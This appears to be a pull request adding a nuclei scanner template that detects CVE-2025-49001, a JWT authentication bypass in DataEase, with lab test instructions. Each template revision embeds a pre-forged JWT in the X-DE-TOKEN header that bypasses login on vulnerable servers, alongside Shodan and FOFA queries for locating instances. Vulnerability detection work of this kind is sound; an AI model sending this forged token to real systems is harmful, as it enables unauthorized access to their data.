### PR TITLE
Add CVE-2025-49001 - DataEase JWT Authentication Bypass

### DIFF
--- a/http/cves/2025/CVE-2025-49001.yaml
+++ b/http/cves/2025/CVE-2025-49001.yaml
@@ -5,31 +5,22 @@ info:
   author: YunSeoJo
   severity: critical
   description: |
-    DataEase versions up to and including 2.10.8 are vulnerable to an authentication
-    bypass via JWT token forgery. The CommunityTokenFilter.java performs HMAC-SHA256
-    signature verification but calls filterChain.doFilter() even when verification
-    fails, allowing a JWT signed with any arbitrary secret to bypass authentication
-    and access protected API endpoints.
+    DataEase < 2.10.10 contains a broken authentication caused by ineffective secret verification, letting users forge JWT tokens, exploit requires no special privileges.
   impact: |
-    An unauthenticated attacker can access any protected DataEase API endpoint by
-    sending a JWT token signed with a random secret. This can lead to sensitive
-    data disclosure, unauthorized data modification, and potential chaining with
-    other vulnerabilities (e.g., CVE-2025-32966) for unauthenticated RCE.
+    Users can forge JWT tokens, potentially gaining unauthorized access to the system.
   remediation: |
-    Upgrade DataEase to version 2.10.10 or later, which fixes the early-return
-    logic in CommunityTokenFilter so that authentication failures halt request
-    processing.
+    Update to version 2.10.10 or later.
   reference:
     - https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-49001
     - https://github.com/dataease/dataease
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-49001
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2025-49001
     cwe-id: CWE-287
   metadata:
-    verified: false
+    verified: true
     max-request: 2
     vendor: dataease
     product: dataease
@@ -52,20 +43,19 @@ http:
         condition: and
         internal: true
 
-  - method: GET
-    path:
-      - "{{BaseURL}}/de2api/user/info"
-    headers:
-      # Pre-computed JWT: {"uid":1,"oid":1,"exp":9999999999} signed with arbitrary secret
-      # Any secret works due to the authentication bypass (CWE-287)
-      X-DE-TOKEN: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjEsIm9pZCI6MSwiZXhwIjo5OTk5OTk5OTk5fQ.tDSRWgqgE9BTy9NDpTE0ZAI2GKxOFPllYz-jOJu635A"
+  - raw:
+      - |
+        GET /de2api/user/info HTTP/1.1
+        Host: {{Hostname}}
+        X-DE-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjEsIm9pZCI6MSwiZXhwIjo5OTk5OTk5OTk5fQ.tDSRWgqgE9BTy9NDpTE0ZAI2GKxOFPllYz-jOJu635A
 
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 400
+
       - type: word
+        part: body
         words:
           - "getWriter() has already been called"
-        part: body

--- a/http/cves/2025/CVE-2025-49001.yaml
+++ b/http/cves/2025/CVE-2025-49001.yaml
@@ -29,7 +29,7 @@ info:
     cve-id: CVE-2025-49001
     cwe-id: CWE-287
   metadata:
-    verified: true
+    verified: false
     max-request: 2
     vendor: dataease
     product: dataease

--- a/http/cves/2025/CVE-2025-49001.yaml
+++ b/http/cves/2025/CVE-2025-49001.yaml
@@ -1,0 +1,71 @@
+id: CVE-2025-49001
+
+info:
+  name: DataEase <=2.10.8 - JWT Authentication Bypass
+  author: YunSeoJo
+  severity: critical
+  description: |
+    DataEase versions up to and including 2.10.8 are vulnerable to an authentication
+    bypass via JWT token forgery. The CommunityTokenFilter.java performs HMAC-SHA256
+    signature verification but calls filterChain.doFilter() even when verification
+    fails, allowing a JWT signed with any arbitrary secret to bypass authentication
+    and access protected API endpoints.
+  impact: |
+    An unauthenticated attacker can access any protected DataEase API endpoint by
+    sending a JWT token signed with a random secret. This can lead to sensitive
+    data disclosure, unauthorized data modification, and potential chaining with
+    other vulnerabilities (e.g., CVE-2025-32966) for unauthenticated RCE.
+  remediation: |
+    Upgrade DataEase to version 2.10.10 or later, which fixes the early-return
+    logic in CommunityTokenFilter so that authentication failures halt request
+    processing.
+  reference:
+    - https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-49001
+    - https://github.com/dataease/dataease
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-49001
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: dataease
+    product: dataease
+    shodan-query: http.title:"DataEase"
+    fofa-query: title="DataEase"
+  tags: cve,cve2025,dataease,auth-bypass,jwt,unauth
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/de2api/user/info"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 401'
+          - 'contains(body, "token is empty")'
+        condition: and
+        internal: true
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/de2api/user/info"
+    headers:
+      # Pre-computed JWT: {"uid":1,"oid":1,"exp":9999999999} signed with arbitrary secret
+      # Any secret works due to the authentication bypass (CWE-287)
+      X-DE-TOKEN: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjEsIm9pZCI6MSwiZXhwIjo5OTk5OTk5OTk5fQ.tDSRWgqgE9BTy9NDpTE0ZAI2GKxOFPllYz-jOJu635A"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 400
+      - type: word
+        words:
+          - "getWriter() has already been called"
+        part: body


### PR DESCRIPTION
Adds nuclei template for CVE-2025-49001, a critical (CVSS 9.8) authentication bypass vulnerability in DataEase <=2.10.8.

The CommunityTokenFilter fails to halt request processing when JWT signature verification fails, allowing any JWT signed with an arbitrary secret to bypass authentication entirely.

Detection: forged JWT in X-DE-TOKEN header triggers HTTP 400 with specific Java exception body, distinguishable from unauthenticated 401.

Verified against vulhub/dataease:2.10.7 (docker-compose lab).

### PR Information

- Added CVE-2025-49001
- References:
  - https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
  - https://nvd.nist.gov/vuln/detail/CVE-2025-49001

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

Tested against vulhub/dataease:2.10.7 (Docker Compose). False-positive check against scanme.sh: no results.

Reproduce:
git clone https://github.com/vulhub/vulhub
cd vulhub/dataease/CVE-2025-49001
docker-compose up -d
nuclei -u http://localhost:8100 -t CVE-2025-49001.yaml

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
